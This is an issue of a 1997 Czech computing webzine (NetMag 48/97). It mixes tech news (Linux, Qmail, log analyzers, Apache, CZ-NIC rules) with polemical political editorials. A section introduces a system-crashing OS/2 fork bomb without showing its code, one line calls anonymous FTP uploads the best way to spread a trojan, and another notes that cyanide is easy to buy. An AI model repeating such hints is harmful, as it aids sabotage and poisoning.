48/97
NetMag - alternativni sitovy magazin o vypocetni technice,
software, sitich a tak vseobecne, a to vse pokud mozno bez tendencnich pripominek,
lzi, reklamnich clanku a nekompetentnich vyroku. Nechceme konkurovat zadnemu ze
zavedenych i novych klasickych a internetovych magazinu - chceme byt jini. Pokud
patrite k tem, kterym uz leze krkem neustale propagovani novych "technologii",
na nichz nic noveho nebo zajimaveho neni, pokud se vam zda, ze pocitacove casopisy
ocenuji produkty, na kterych neni nic zajimaveho a ktere si to nezaslouzi, prave jste
narazili na svuj novy oblibeny magazin. Samozrejme se nebudeme vyhybat ani
politicke a spolecenske scene, ale to je pro nas jen okrajove tema. Nove clanky a novi
prispevatele jsou vitani. Upozornujeme vsechny, ze prejimani clanku z NetMagu do jinych
medii, vytvareni verejnych mirror site NetMagu a podobne aktivity jsou zakazany, pokud
k nim nedame v danem konkretnim pripade souhlas.
NetMag vychazi zpravidla kazdy tyden, v jednotne jednoduche graficke uprave, aby byl citelny i browsery typu Lynx, zasadne bez frames a bez diakritiky, doporucujeme vsak radeji IBM WebExplorer 1.1 nebo 1.2, Netscape Navigator nebo Arachne.
Sefredaktorem a vydavatelem NetMagu je Zbynek Pospichal, vykonnym redaktorem je Radim Kolar.
Obsah vydani (vychazi 13.11.)
Par slov uvodem
Mobil Server si poridil dalsi pocitac a umistil jej PVTNET. Ne, nejde o mirror,
jen o forwarder (obousmerny), ktery presmerovava requesty na sebe na requesty na
hlavni server Mobilu. Nejde o oficialni informaci od Mobilu, existuji lepsi finty,
jak takove veci zjistit... Jednou z nich je prohlizeni DNS zaznamu, dalsi pak dumpovani
packetu. Rozdil v rychlosti mezi www.mobil.cz a pvt.mobil.cz
je hlavne z CESNETu velmi snadno rozpoznatelny, pokud nepouzivate nekde rafinovane
umistenou proxy.
Kdyz uz jsme u Mobil Serveru - slyseli jste uz o mobilni telefonu Nokia 6110?
Jestli ne, nelze nez doporucit si precist
recenzi
- Nokie 6110 je totiz opravdu bomba!
Pokud meditujete nad problemem integrace Unixu a Windows NT (da se po smyslu
prenest i na Warp Server), zkuste www.unixnt.com.
Kdyz uz jsme u Warp Serveru - vcera jsme do nej pridali dalsi sitovou kartu
(uz tam mame tedy mame tri fyzicke a nad nimi ctyri logicke sitove adaptery),
coz zpusobilo vypadek NetMagu. Byla to opet obvykla valka s plug & play, ktera
nam vsak tentokrat trvala rekordne kratkou dobu - jen asi dve a pul hodiny
vcetne nakonfigurovani sitovych protokolu atd.
Mame i tentokrat nejake novinky? Ale jiste. Opet je nova verze generatoru
NetMag Daily v HTML podobe, tentokrat se uprava tykala
snazsiho vyhledavani clanku z Daily v archivech. Nicmene to neni to hlavni.
Hlavni novinkou je ovsem cela nova priloha NetMagu - Unix
Infocentrum (UIC). Jde vlastne o typicky zpravodajsky server, jako je treba
cNet, nicmene zamereny jen a pouze na Unix (a castecne take na Javu a Network
Computing) a jeste ke vsemu cesky. Update UIC se bude provadet prubezne - tj.
nejde o denik, ani o tydenik, ani o mesicnik, ale i v tomto smeru je to
zpravodajsky server.
Zkuste se podivat browserem se zakazanym JavaScriptem na
www.paegas.cz. Bez JavaScriptu jsou stranky
RadioMobilu naprosto necitelne (uvidite jen sedou prazdnou stranku). Nas
nejpopularnejsi mobilni operator od ctenaru sveho webu pravdepodobne ocekava, ze
jsou naprosto tupi a bezpecnostni diry v Javascriptu (a tedy i to, ze se jim
Radiomobil muze hrabat na disku) jim nevadi... Navic ne kazdy browser Javascript umi.
V DNS zaznamech domeny mystique.sk je take chyba, konkretne MX zaznam
smeruje na neexistujici pocitac - tudiz tam nemohla byt odeslana e-mail
distribuce NetMagu....
Detonatora (viz krasny dopis v minulem cisle)
uz skoro mame, na 95% vime kdo to je (osobne ovsem toho cloveka zatim nezname),
take uz vim, jakym zpusobem pravdepodobne ziskal moji adresu. Nyni je na rade
otazka Co s nim?
Zbytek uvodniku a dalsi clanek se tykaji vicemene politiky... Opet upozornuji
vsechny, ze cilem neni politicka propagace, ale poskytovani informaci a nase drobne
postrehy k tomu. Pokud je nekdo na soucasna zhava temata citlivy, at to prosim
radeji necte.
Skinhead zabil pobliz zizkovskych koleji sudanskeho studenta VSE. Je z toho
okamzite rasove motivovana vrazda, i kdyz mnoho okolnosti kolem cele zalezitosti
neni jeste znamo. Nemate-li dukazy, nesudte ani pachatele, ani obet. Nicmene v
pondeli se z popudu cele udalosti na namesti Winstona Churchila (ano, to je ten
travnaty placek pred VSE, hned vedle Domu odboru) konala demonstrace proti
rasismu - co z toho vyplyva? Kdyz zabijou cernocha, je z toho demonstrace.
Kdyz zabijou belocha, nikoho to nezajima!
Nicmene cela demonstrace se zvrhla v populistickou propagaci koalice i opozice,
dokonce Zeman (znamy svoji notickou: Na kazdou slozitou otazku existuje
jasna a jednoducha, ale nespravna odpoved), prisel s jednoduchou odpovedi:
navrhem postavit Skinheads mimo zakon. Jak to dopadne, nikdo nevi - mozna bude
povinna nejmensi delka vlasu 2 cm a vsichni holohlavi budou muset povinne nosit
paruku. Ostatne proc ne: Az nekoho zabije clen ODS, postavime mimo zakon ODS, az
nekoho zabije zeleznicar, postavime mimo zakon zeleznicare, az nekoho zabije nekdo,
komu je 36 let, postavime mimo zakon vsechny, komu je prave 36 let a az nekoho
zabije treba cikan, postavime mimo zakon cikany. Opet zadna propagace hnuti
smerujiciho k potlaceni svobod obcanu? Ne? Ja z jsem jen dosadil hodnoty do
vzorce, ktery sestavil ustavni cinitel teto zeme! Jiz z tohoto pristupu vyplyva,
jaky je soudruh Zeman vlastne demokrat. Tohle mohou prohlasit
republikani (ti by to ovsem neprohlasili, ti se skinheady sympatizuji) nebo
komuniste, ale ne nekdo, kdo je ve strane s pridomkem demokraticka.
Tenhleten Vysavac zase zaluje Mladou frontu za zverejneni vtipu na lidovce, pry
hanobeni rasy, naroda a presvedceni. Coz kdyby takhle treba rasiste
zalovali vsechny, kdo proti rasismu broji, za totez, tedy za hanobeni
presvedceni? To by byl ovsem husarsky kousek. V teto zemi situace ovsem vypada
paradoxne tak, ze prakticky kazdy nema rad osoby s jinou barvou pleti a
rasismus... To prvni ovsem nikdo nerika nahlas.
Zpevak a pisnickar Jaroslav Hutka, znama postava z listopadove revoluce,
prohlasil o nekolika politicich vcetne exministra Dyby a exministra a soucasneho
sefa uradu pro statni informacni system Igora Nemce, ze jsou gauneri. Exministr
Dyba se rozhodl - podle znameho rceni, ze potrefena husa se ozve, nenechat vec
jen tak a podal na Jaroslava Hutku trestni oznameni ve veci trestneho cinu
pomluvy. Ted je na exministru Dybovi, aby prokazal, ze neni gauner. To ovsem
pred soudem prokaze jen velice tezko, nebot tato skutecnost je jiz par let
predmetem verejneho tajemstvi. Podivna privatizace SPT Telecom, vstup TelSource
a do nebe volajici monopol SPT Telecom na vetsinu sluzeb je dilem prave exministra
Dyby a jeho podrizenych na tehdejsim ministerstvu hospodarstvi, ale to uz snad ani
neni gaunerstvi - to je primo zaskodnictvi. Jen diky tomu vypada situace na ceskem
telekomunikacnim trhu tak, jak vypada.
Nasledujici clanek od Radima ve mne vzbudil urcitou melancholii. Nastesti mne
nikdo sproste maily neposila a doufam, ze to tak zustane, ale to, ceho je obeti
(nota bene je v tom celkem nevinne), me sokuje. Pokud ma byt ovsem ucelem cilene
kampane to, abychom prestali vydavat magazin, ktery je nekomu trnem v oku, tak
se ovsem dotycny prepocital. Ono je na jednu stranu pekne, ze nam narusta
navstevnost tempem nevidanym, ale ma to i sve stinne stranky a vetsinu novych
navstevniku tvori BFU, kteri volaji po zavedeni frames, po nekritizovani
Microsoftu, po preorientovani se z OS/2, Unixu a NC na Microsoft a
Wintel - nebot prave o to tu od zacatku jde. Jiste - posledni dobou si stale
kladu otazku, jestli to delame dobre, co se da zlepsit atd. U vetsiny dochazim
ke kladne odpovedi, u rady otazek odpoved zatim nenalezam...
Extremisticky platek na sest V posledni dobe mne zacinaji chodit ponekud vice nez je obvykle maily
oznacujici NM za E.P. (cize nic noveho pod sluncem - mimochodem dozvedel jsem
se nejenom ze jsem rasista, na co jsem si uz zvykl, ale dokonce ze jsem fasista,
coz mne pomerne prekvapilo). Zverejnovat DETONATORUV dopis
nebyl prave dobry napad - zacina mne podobnych dopisu chodit vice. Situaci resim
tim, ze na jednani podobnych individui porovnavam s par. 197a trestniho zakona.
Asi nekdo o nas zase nekdo neco hezkeho napsal. Bohuzel, nasledky techto negativnich reklam
na NetMag jsou obvykle uplne jine nez jejich autor puvodne zamyslel - takove, ze si ho prihlasi
XX novych ctenaru postou, coz mne neskutecne rozciluje, protoze NM postou (bohuzel) posilam ja (ano, byl to muj napad)
a porad se to snazim prehrat na nekoho jineho, coz se mne zatim nepodarilo (intenzivne
na tom ale pracuji). S distribuci emailem souvisi jeste jeden problem, ktery si asi zatim moc
neuvedomujete. Az nestihne server (presneji receno linka) za tyden poslat
vsechny vytisky jednoho cisla NM, bude prihlasovani do email distribuce zastaveno a
poslednich XX lidi bude vyrazeno - prece nebudeme vyrazovat nase dlouhodobe odberatele
ze zacatku. Rychlejsi linku kvuli tomu rozhodne kupovat nebudeme. Timto mirne naznacuji,
ze bych uvital i kdyby mne nekdo pujcil kus serveru k rozesilani NM, kdyz uz mi tam nechce
udelat listy. Jen bych upozornil pripadne zajemce, ze za
zapujceni serveru (linky) se nebudou konat zadne zasahy do casopisu - cesky receno reklama.
Jedina reklama bude v Received: hlavicce a pripade tez v Message-Id.
Nebo si nas vzala na musku zase nejaka televize ? Reportaz:
Uz i rasiste pouzivaji Internet k sireni svych myslenek!
inspirovana uvodniky v cislech NetMag 35
a NetMag 36 byla opravdu super! OPAKOVAT!
Mimochodem, kdyz porovnate (bohuzel) nezavisly casopis NM a (bohudik) nezavislou TV,
tak najdete vice spolecnych rysu, nez byste cekali. Jde o to, ze se sice ctenarum/posluchacum
da popis udalosti, ale z toho uhlu pohledu na vec, ktery uzna redakce za vhodne. Tohle ale
delaji vice ci mene vsichni (mysleno jako vsechna media - TV, noviny, ...),
protoze byt objektivni je strasne tezke a temer nemozne. Pokud budete psat
nejaky clanek nastvani, tak se to v nem zakonite objevi - musi se to v nem
objevit, protoze clovek neni RKB, ktery pracuje porad stejne (blbe...).
Pratelum ze vsech 3 nasich TV jsem slibil jadernou bombu. Bohuzel, nedostal
jsem povoleni k prekladu do cestiny, presneji reseno nedostal jsem
to povoleni zadarmo, coz je skoda. Ten clanek z FFS, ktery
jsem mel na mysli byl velice zabavny a byl psan tak, ze nevite, zda to je
sranda ci nikoliv. Vsadim se, ze by na to skocilo i MVCR. Takze, pokud touzite po jaderne
bombe, budete muset vzit zavdek ucebnici fyziky ci naucnym slovnikem - proc nikdo netoci o
tom, jak nebezpecne veci se daji v naucnem slovniku najit ? TNT, dynamit, fosgen ...
Mam napad, zacneme to cenzurovat! Predne navrhuji zcenzurovat jedovate rostliny z
atlasu bylin, protoze jsou snadno dostupne a mohli bychom s tim nekoho otravit. Dale
budeme popirat existenci takovych nebezpecnych veci jako muchomurka zelena, kyanid
draselny a podobne. At zije nevedomost! Mimochodem nasi pratele z TV a MVCR, vite o tom, ze
kyanid draselny (chemicka znacka KCN, znamy tez jako cyankaly) se da normalne zakoupit
v obchode s chemikaliemi ? Klidne vam ho tam prodaji kilo. Tocit o kyanidu je lepsi nez o NM,
protoze kyanid vas narozdil od nas nezazaluje za porusovani autorskych prav. Uz se tesim na
vasi bomastickou reportaz! Dosahnete akorat toho, ze si ho spousta lidi pujde koupit a bude otravovat sve sousedy.
Vsechno co vidite v tomto clanku nad timto odstavcem jsem nemel puvodne v umyslu napsat.
Chtel jsem se tu zaobirat veci, ktera rozciluje priblizne polovinu nasich ctenaru. Je to fakt,
ze se v nasem casopisu vyskytuji clanky, ktere v "serioznich" casopisech nenajdete.
Casopis NetMag, byl od sveho zalozeni Zbynkem Pospichalem
v prosinci 96 klasifikovan jako casopis alternativni. Alternativni je napriklad
televizni program CT2. Tento program ma jinou skladbu poradu, ma mene divaku nez programy ostatni, ale ja
osobne velmi dekuji ceske televizi, ze takovy program pro nas divaky dela. Pokud by z CT2 udelali neco jako
TV N@VA, tak uz by to nebyl CT2. CT2 nenahrazuje napr. CT1 - CT2 ho doplnuje. To same plati o NetMagu.
To, ze se mu v soucasne dobre rika JavaMag, a ctou nas lide prevazne s browsery pod WinDoZe je vec druha. Ja kvuli
nim rozhodne nehodlam delat zadne zmeny do tohoto casopisu. To same plati pro ty, kteri se nabizeji ze by do NetMagu
psali, kdyby ...
Prave jsem shledl dokument o 'Mr. Beanovi' (a nasledujici Monty Pythonuv Quest for Holy Grail) na CT2 a zjistil
jsem, ze ma sam ze sebe desnou srandu. Ja mam zase srandu z NetMagu - velmi dobre se u nej bavim. Je to spatne ?
Proc ? Kdyby byla FFS vazna tiskovina, tak pochybuji ze by ji tolik lidi cetlo,
protoze pokud chce nekdo zpravy ze sveta, tak si pusti CNN dot COM,
protoze to delaji ze vsech nejlepe.
Citat z knihy Franka Herberta Duna ]I[, ktery pronesl Paul, pote co oslepl
a zemrela mu manzelka a jista skupina lidi mu nabizela, ze ji zase
ozivi: Je cena, kterou si Atreid nemuze dovolit zaplatit..
Pravdepodobne (predpokladam, ze velmi brzy to zjistime) se mi podarilo
(a ze to trvalo!) nastvat Ceskou pobocku Institutu Cernych Kouzel.
Povestnou posledni kapku tvorila moje zminka o jejich nepovedenem
reklamnim letaku. Obdrzel jsem od nich docela ftipny komentar: Nekdo nezvladne ostavec,
nekdo cely casopis a dale takove ty reci o extremistickem fasistickem casopisu, narazejici
na Uvodnik v cisle 45 a o tom ze by se nam
mohlo stat toto - cituji:
Osud preje pripravenym - poznamenejte si nasi ip adresu:
Mozna bychom si tu meli udelat seznam instituci, ktere se nam jeste nastvat
nepodarilo a cilenene na tom pracovat :) Navrhuji nasledujici akci, proti statnim
institucim, kde nas ctou - MVCR, parlament, senat, hrad... Budou si moci cist
NM pouze mimo svoji hlavni pracovni dobu, doufam jen, ze jim tam neplati prescasy :)
P.S. Empiricky jsem zjistil, ze nemam drevene auto,
protoze mne drzi na strese antena DV k cimbalu, zvana magnetka a na me zdrevenele
hlave nedrzi. Tedy co to placam - znate knihu Drevene kosmicke lode od Boba Shawa ? Ne ?
Vas problem. Zjistil jsem, ze mne clanky tohoto typu jdou vylozene hezky od
ruky - 40kB/den - zadny problem, nechcete to nekdo kupovat ?
SETI@home Vite co znamena zkratka SETI? Kdo hral nekdy Civilizaci, ten to vi - znamena to
Search for ExtraTerrestial Intelligence (hledani mimozemske inteligence). Jak
takova akce SETI probiha? Nebojte se, nikdo nebeha po vesmiru s baterkou a
nehleda zelene muzicky s antenkami na hlave, vyuziva se vymozenosti radioastronomie.
Nejvetsi radioteleskop na svete je na ostrove Portoriko v Karibskem mori. Ten
prijima signaly - jenze problem je v tom, ze je nema kdo vyhodnocovat, nebot
dostatecnym mnozstvim tak silnych stroju zatim zadne vyzkumne stredisko
nedisponuje a vlady na to dost penez dat nechteji, takze by projekt nemohl
probihat v realnem case.
A proto vznikl napad udelat velkou akci, podobnou akcim s louskanim kryptovacich
algoritmu, kdy se do vyhodnocovani informaci zapoji desetitisice ci statisice
pocitacu v Internetu (podle poslednich informaci se k RC5-64 Cracking challenge
pripojilo jiz vice nez 100000 pocitacu) a ziska se timto zpusobem nevidany
vypocetni vykon, ktery navic stale roste. Vas pocitac tak muze poslouzit celemu
lidstvu ve vyvoji smerem kupredu. Akce SETI@home
vypukne zacatkem roku 1998, jeji masivni nastup lze vsak predpokladat az po
dokonceni RC5-64 Cracking challenge (se stavajicim vypocetnim vykonem by trvalo
jeste cca. 100 let, protagoniste RC5-64 jsou vsak velkymi optimisty a veri, ze
se celou akci podari ukoncit uz nekdy v polovine roku 1998). Konecne nepujde o
zalezitost, kdy se lide snazi prechytracit sve vlastni napady, ale bude se delat
neco skutecne uzitecneho.
Jednotny binarni format v Unixech na Intel procesorech
prinasi sdruzeni 86open jako
common 86open binary format. Tento prijemny binarni format ma byt k dispozici
pro nasledujici platformy bezici na Intel (a samozrejme AMD, Cyrix a dalsich
kompatibilnich) procesorech: BSDI, FreeBSD, Linux, NetBSD, SCO OpenServer, Sunsoft
Solaris X86 a SCO UnixWare. Cely format ma vyuzivat moznosti GNU glibc verze 2,
cimz vznikne jednotny podporovany subset API funkci vyuzitelnych nejen na techto,
ale teoreticky i na cele rade dalsich (a to mozna i neunixovskych) systemu.
Linux kernel 2.1.63
se objevil dnes (tj. ve ctvrtek). Co prinasi noveho? Novinkou je specialni (vedle
dosavadni genericke) podpora RAID-1 a RAID-4/RAID-5 diskovych poli a nekterych
radicu techto poli, do kernelu se opet vratila podpora pro ZIP drive pripojeny
na paralelni port, novinkou je take podpora pro radiove karty do PC, byla ponekud
prepsana podpora IPX protokolu a fragmentace IP packetu. Hlavni novinkou vsak
je, ze kernel pri startu testuje, zda vas procesor nahodou nema tento tyden tak
popularni chybu s instrukci F00FC7C8 a pokud ano, tak vas na tuto skutecnost
upozorni. Osetrit ta chyba zel bohu jednoduse, spolehlive a zaroven ve vsech
pripadech nejde, jedinym moznym resenim by byla emulace procesoru na sobe
samem, coz by pravdepodobne skoncilo tim, ze chyba uz by se sice neobjevila,
ale Pentium by bylo asi tak o rad pomalejsi nez 486 (ano, existuji i jina reseni,
ktera kontroluji frontu instrukci pred procesorem, ale i ta spomaluji, i kdyz ne
tolik, nicmene nemusi vzdy zabrat - napr. po NMI - a nekdy mohou zpusobit plany
poplach). A obvykle zmeny a bugfixy v implementaci dymanicke cache a spravy
pameti, v podpore nekterych filesystemu atd. - ostatne jak uz jsme zvykli...
Qmail Program Qmail
je podobne jako
Sendmail SMTP daemon. Qmail je pochopitelne k dispozici zdarma a to
vcetne zdrojoveho kodu, jak se ve svete UNIXu uz hezkou radku let bezne zvykem.
Pri vyvoji Qmailu bylo velmi dbano na bezpecnost. Pokud vas unavuje delat
neustale updaty sendmailu, protoze u nej plati jiz priblizne posledni
2 roky pravidlo, ze jedina bezpecna verze je verze posledni, tak je qmail
pro vas to prave orechove. Qmail je bezpecnejsi nez sendmail - nebezi cely
pod rootem, nepouziva z c-knihovny funkce, kde muze nastat buffer overflow
- misto toho pouziva knihovnu vlastni.
Urcite vas zajima, zda umi Qmail vsechno co Sendmail. Odpoved zni ne, ale
umi vse, budete ve vetsine pripadu ze sendmailu vyuzivat. Sendmail je neskutecne
flexibilni program, pokud ho znate do detailu, vycarujete s tim vse, co kdy
muzete potreboval. Flexibilita sendmailu je ale dost lidem na obtiz, protoze
jej neumi spravne nakonfigurovat ani "profesionalove" nekterych ISP. Ve vetsine
pripadu vsak neni nutne do konfiguracniho souboru sendmail.cf (prezdiva
se mu: dekuji, uz jsem dneska zvracel) po jeho
vygenerovani m4 scripty zasahovat. Jako perlicku uvedu to, ze se da sendmail
specialnim konfiguracnim souborem donutit k hrani piskvorek na poli 5x5!
Chcete ho ? Try net legends !
Oproti tomu ma Qmail velmi jednoduchou konfiguraci - tzn. neda se v ni
nasekat tolik chyb a je KBV-style.
Dalsi potesujici vlastnosti Qmailu je jeho rychlost. Oproti sendmailu
je opravdu znatelne rychlejsi (nekdo uvadi az 10x), coz pocitite pokud pres vas stroj behaji
tisicovky mailu denne. Qmail ma tez docela uchazejici podporu pro praci
s mailing listy. Dale ma par detekci na jednotlive sendmail-like bomby - napr.
zdetekuje .forward bombu.
Qmail se snazi byt maximalne kompatibilni ze Sendmailem, ale jsou tu jiste
nekompatibility na strane 'dovnitr', takze je nutne prezkouset vsechny unix
programy, ktere maji co do cineni s postou, zda zvladaji i qmail. Na strane ven,
si vsimnete, ze umi par SMTP prikazu navic a par mu jich zase chybi (napr. SIZE).
Qmail neni zatim ve svete moc podporovan a i jeho autor ho moc nepodporuje.
Tj. neodpovida temer na zadne maily a s updates to uz vubec neprehani. Jeho
motto je ber nebo nech byt.
Na druhe strane vsak velmi rad flamuje ty, co mu na qmail nadavaji. Tato jeho vlastnost
je znama a tak ho vzdy cas od casu nekdo zkousi vyprovokovat, coz se obvykle povede.
Zaciname programovat v Jave
Volne navazujici na jeden z mych lepsich clanku o Jave z NetMagu 27/97. Proved'te nasledujici kroky: Srovnani httpd log analyzeru Srovnavali jsme ctyri produkty: http-analyze 1.9 od Rent-A-Guru, wusage 3.2,
analog 2.11 a wwwstat 2.0 (v kombinaci s gwstat 2.3)... Vsechny programy jsou urceny pro Unix a
vsechny se distribuuji pod GPL. Samozrejme uznavam, ze existuji i dalsi programy tohoto typu, hlavne pro Windows
(na Yahoo maji dokonce
svoji vlastni oblast), ale vyse zminene programy jsou pravdepodobne nejdokonalejsi. Ostatne vetsina tech komercnich ma take za vzor
nektery z techto free httpd log analyzeru, nektere vznikly dokonce i tak, ze
autor toho puvodniho programu dostudoval, vzal sve zdrojaky, portnul je do
Windows, tam vse integroval do dialogu, aby to bylo snadne, napsal
manual, dal to cele do krabice a zacal svuj produkt prodavat.
Zacneme asi nejjednodussim programem wusage. Wusage vam rekne opravdu jen to
nejnutnejsi: kolik lidi z jakych pocitacu a na jaka URL pristupovalo na vase
stranky. Statistiky jsou tvoreny po tydnech. S access_log ze serveru NetMagu jiz
mel znacne problemy, poslednich nekolik tydnu vubec nevyhodnotil. Nejjspartansteji
vypadaji i vystupni grafy, graf z wusage muzete videt zde:
Dalsim na rade budiz program analog. Vysledky z analogu jiz maji jistou
vypovidaci schopnost - analog se snazi vam sdelit vsechny mozne informace o
pristupech na vas server: o poctech requestu celkem, o prumernem poctu requestu,
kolik z celkoveho poctu requestu tvori pristupy na stranky, unique IP adresach
apod. Graf z analogu vypada takto (velke PLUS - je citelny i v Lynxu):
Nyni muzeme pokracovat sympatickym programkem http-analyze. Vyhodou http-analyze
je pravdepodobne nejjednodussi instalace, kompletni konfigurovatelnost z prikazove
radky a nejcitelnejsi logy ze vsech srovnavanych programu. I http-analyze vam
poskytne vycerpavajici udaje ohledne navstevnosti vaseho web serveru. Specifickou
vlastnosti je, ze statistiky jsou (narozdil od ostatnich programu) vyhodnocovany
zasadne po mesicich, nejsou vsak k dispozici kompletni vysledky napr. za cely rok
ci za celou dobu behu vaseho serveru. Vystup z http-analyze (zatizeni za jednotlive
dny v mesici) je zde:
Program wwwstat je velmi specificky. Sam o sobe neumi tvorit grafy (k tomu se
vyuziva jeho nadstavby gwstat) a oba tyhle programy nejsou napsane v zadnem
poradnem jazyce, ale jsou interpretovany v PERLu. wwwstat je rozsahem podavanych
informaci zjevne nejuniverzalnejsi, gwstat zase dela pravdepodobne nejhezci grafy
(pouziva jej treba EUnet CZ pro vyhodnocovani statistik na svych virtualnich
serverech), nicmene ze vsech ctyr zminenych programu vam da pravdepodobne nejvice
prace tenhle dvojprogram (tohle krasne slovo mi neda nevzpomenout Billovych bubaku
HIMEM a EMM386, kteri - ovsem skryti ve Windows 95 - ziji dodnes...) rozchodit - nebot
ke zprovozneni gwstatu budete potrebovat jeste dalsi software - Xmgr nebo gr, ktere
jsou vyuzivany pro fyzickou tvorbu grafu. wwwstat jako jediny odmazava access_log
a archivuje ho v gzipovane forme. Statistiky jsou vytvareny pro zmenu pro cele roky.
Sam jsem si vybral http-analyze, jehoz vystupy obcas doplnim informacemi z
analogu (rocni statistiky atp.), nebot tohle reseni je pro moje potreby
nejefektivneji. Co budete pouzivat vy zalezi samozrejme jenom na vas.
CZ-NIC pravidla...
Na CZ-NIC jsme jeste v NetMagu hnuj nehazeli, je patrne na case to napravit.
Cela pravidla pro registraci domenovych jmen uvadet nebudeme, najdete je
zde,
odcitujeme jen par nejzajimavejsich casti:
Doufam, ze se nekdo z CZ-NIC ozve a vysvetli vsem, jak ta pravidla mame chapat
a kdo je ma vlastne brat vazne, kdyz je nedodrzuje ani CZ-NIC sam.
Apache 1.3.x
Svetlo sveta spatrila beta verze 1.3b2, prvni oficialni beta Apache 1.3x, kterou
lze spustit i pod Windows (Win32). Jake jsou nove vlastnosti Apache 1.3 oproti verzim
1.2? Je k dispozici spell checker (samozrejme anglicky) jako modul. Dale jsou
k dispozici prikazy SetEnvIf a SetEnvIfNoCase, rozsireni doznalo
porovnavani retezcu v ramci SSI (server side includes) - vice o nich viz clanek
v NetMagu 35/97, preorganizovane
zdrojove kody, moznost trideni ve vypisech adresaru, mensi buffery pro CGI
scripty a zmenila se tez dlouha rada dalsich, mene podstatnych veci.
Thrash bomba
Na Fork bombu jsem dostal celou radku reakci,
par lidi mne nadavalo ze jim BFU likviduje pocitac fork bombou na zaklade meho
clanku. Odpoved - try ulimit.
Dnesni bomba je OS/2-specificka verze fork bomby, uprava pro Windows je snadna.
Touto bombou muzete sejmout jen svuj pocitac, protoze telnetd v os2 vyzaduje heslo.
Ciste teoreticky by to OS/2 shodit nemelo, ale v3 to shodi dokonale (nejde
ani CTRL-ALT-DEL) u v4 je to sice lepsi, ale ne o moc - dostavi se stejny efekt jako
u forkbomby. Pomoci c:\kill.flg se tato bomba zastavi. .BAT virus 2 Minuly clanek o .BAT virech zaujal
Jana Kratochvila tak, ze vytvoril
dalsi (a chytrejsi) .BAT virus. Mozna by stalo za uvahu dodelat do antivirovych
programu support pro .BAT viry :)
RKB^H^H^H Computer Na Invexu jsem obdrzel vytisk $(SUBJ) 19/97. Po prolistovani tohoto casopisu
musim rici, ze jeho jedina vyhoda je cena 14Kc/Sk. Obsahuje totiz dost
znacne mnozstvi reklam, velke seznamy jednotlivych pocitacovych komponent
s nazvem Cenova Zahrada, ktere zjevne slouzi jen jako zacpavac volneho
mista pri nedostatku clanku ci reklam.
Zajimave je, ze dle jejich vlastniho pruzkumu je tato tiskovina je druha
nejctenejsi u nas, hned po CHIPu. Ostatni anketni otazky co tam vyhodnocuji
byly spatne polozeny. Uvedu priklad.
Nejlepsi cast nasleduje: ,,Velke nebezpeci mohou predstavovat i
technologie Java a Active X, ktere v rade implementaci obsahuji velke
bezpecnostni diry a moznosti zejmena pro trojske kone''. Tedy porovnava
krumpac a lopatu. Naopak pravdepodobne povazuje JavaScript za bezpecnou
technologii. Pokud tedy Pan Reditel narazi
Javovskeho trojskeho kone, ktery pracuje
jinak nez pomoci java.lang.Runtime.exec ci podobnych metod, ktere browser nepodporuje,
tak at mne da vedet. Bezkonkurencne nejlepsi medium pro sireni trojskeho kone
je upload do znameho anonymniho ftp archivu. Jednoduche a nejucinejsi.
Dalsi zajimavou veci jsou clanky Karla Obluka (znam ho z Fida a z logu na
NetMagu), kterymi se snazi vyvolat flamewar UNIX vs NT, pricemz stoji na
strane NT. Bohuzel, jeho email adresa tam nikde uvedena neni a i kdyby byla
tak UNIX guru bude tezko cist Computer a i kdyby cetl, tak tezko bude mit naladu
a cas na hadani, takze jeho prani o tom, aby mu Unixaci zaplnili hatemaily
mailbox asi zustane jenom pranim. Kdyz se chce hadat, tak nechapu proc nepouzije
nejakou flamovaci news skupinu, kde by mel siroke pole pusobnosti. Kdyby psal do
NetMagu a vyrobil nejaky clanek Unix vs. NT, tak by byli jeho sance
nekolikanasobne vetsi.
Velka anketa bezi od nedele znovu
Tedy - ne cela. Jen prvni ctyri otazky. Doslo k drobne zavade s nekompatibilitou
stranek s anektou na hlavni site a na mirroru a tak respondenti z netmag.mobil.cz
odpovidali na jine otazky, nez na ktere si mysleli, ze odpovidaji - coz samozrejme
melo svuj dopad i na vysledky ankety, ktere se timto staly nepouzitelnymi.
Anketu najdete jako obvykle zde.
by Zbynek Pospichal
by Radim Kolar
C:\>host netmag.home.cz
host: unknown host netmag.home.cz
Povoleni zverejnit cely dopis jsem neobrzel, protoze by mel pry jeho autor
mozne pracovni potize. Pravdepodobne v Institutu Cernych Kouzel litaji po
vysloveni slova NetMag blesky :) Az je pujdu navstivit - nezapomenu
si oblect NetMag tricko.
by Zbynek Pospichal
by Zbynek Pospichal
by Zbynek Pospichal
by Radim Kolar
by Radim Kolar
by Zbynek Pospichal
Monthly Report
Each unit (
month: pages:
-------- -----
Mar 1997: 444:
by Zbynek Pospichal
4.1. Krome postupu uvedenych v Postupu pro reseni sporu CZ-NICu, je CZ-NIC opravnen
kdykoliv zrusit nebo pozastavit provadeni registrace nebo pozastavit nebo zrusit
registraci domenoveho jmena s okamzitou platnosti, zjisti-li ci se jinak dozvi o
tom, ze doslo k nasledujicim situacim:
* pokud je Domenove jmeno spravovano zpusobem, ktery muze ohrozit cinnost internetove
site nebo jakekoli jeji casti (napriklad situace, kde nameservery prislusejici k
registrovanemu Domenovemu jmenu jsou mimo provoz dele nez 14 po sobe nasledujicich dnu
bude velmi pravdepodobne povazovana za ohrozeni provozu mistni casti internetove site a
CZ-NIC je opravnen vykonat sva prava podle tohoto ustanoveni);
* pokud dojde ke zmene skutecnosti, na jejimz zaklade bylo Domenove jmeno zaregistrovano,
napriklad organizace, ktera predlozila zadost, jiz neexistuje;
* pokud se CZ-NIC dozvi, ze je Domenove jmeno uzivano zpusobem, ktery muze byt klamavym
pro uzivatele Internetu;
* jestlize byl CZ-NIC informovan, ze byly zahajeny pravni kroky tykajici se registrace
nebo uzivani Domenoveho jmena;
* jestlize je podle nazoru CZ-NICu pravdepodobne, ze jedna z vyse uvedenych situaci
nastane.
To jsou fajn podminky, ne? K jednotlivym bodum: nejsem presvedcen o tom, ze vypadek
nameserveru zpusobi ohrozeni mistni casti internetove site. Shori snad router? Ne.
Jen nebude chodit posta, coz bude znamenat docasny mirny narust traffic na dratech
(dokud sendmailu nedojde, ze ten mail proste nedojde...). Druhy bod take neni uplne
korektni - dokud je za domenu placeno, neni duvod ji rusit proto, ze zaniknul jeji
vlastnik. Pokud se CZ-NIC dozvi, ze pomoci domenoveho jmena nekoho klamete (ono tak
byt ovsem ve skutecnosti nemusi, pokud se striktne budeme drzet pravidel, tak staci,
kdyz se to CZ-NIC od nekoho dozvi...) nebo pokud podate na nekoho zalobu (byt
